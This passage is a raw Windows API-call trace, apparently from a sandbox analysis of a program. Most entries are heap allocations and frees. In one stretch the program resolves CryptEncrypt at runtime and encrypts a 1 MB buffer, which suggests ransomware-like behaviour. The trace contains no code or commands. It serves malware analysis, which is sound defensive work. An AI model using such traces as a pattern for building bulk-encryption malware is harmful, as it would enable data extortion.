Size=0x10) returned 0x2e50740 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0195.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0195.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0195.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0195.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0195.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0195.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0195.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0195.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0195.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0195.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0195.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x12a1020 [0195.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x12a1020 | out: hHeap=0x970000) returned 1 [0195.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0195.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0195.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0195.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0195.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0195.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0195.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0195.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0195.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0195.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0195.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0195.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0195.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0195.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0195.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0195.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0195.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0195.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0195.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0195.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0195.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0195.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0195.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0195.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0195.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0195.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0195.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0195.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0195.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0195.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0195.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0195.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0195.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0195.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0195.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0195.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0195.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0195.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0195.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0195.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0195.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0195.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0195.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0195.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e509e0 [0195.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0195.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0195.374] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0195.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0195.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0195.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54080 [0195.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0195.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0195.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0195.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0195.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0195.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0195.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0195.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0195.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0195.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0195.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0195.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0195.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0195.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0195.376] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1194020*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x100000 | out: pbData=0x1194020*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0195.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0195.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0195.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0195.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0195.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0195.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0195.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0195.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0195.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0195.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0195.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0195.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0195.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0195.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0195.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0195.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0195.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0195.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0195.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0195.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0195.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0195.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0195.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0195.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0195.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0195.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0195.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0195.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0195.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0195.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0195.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) 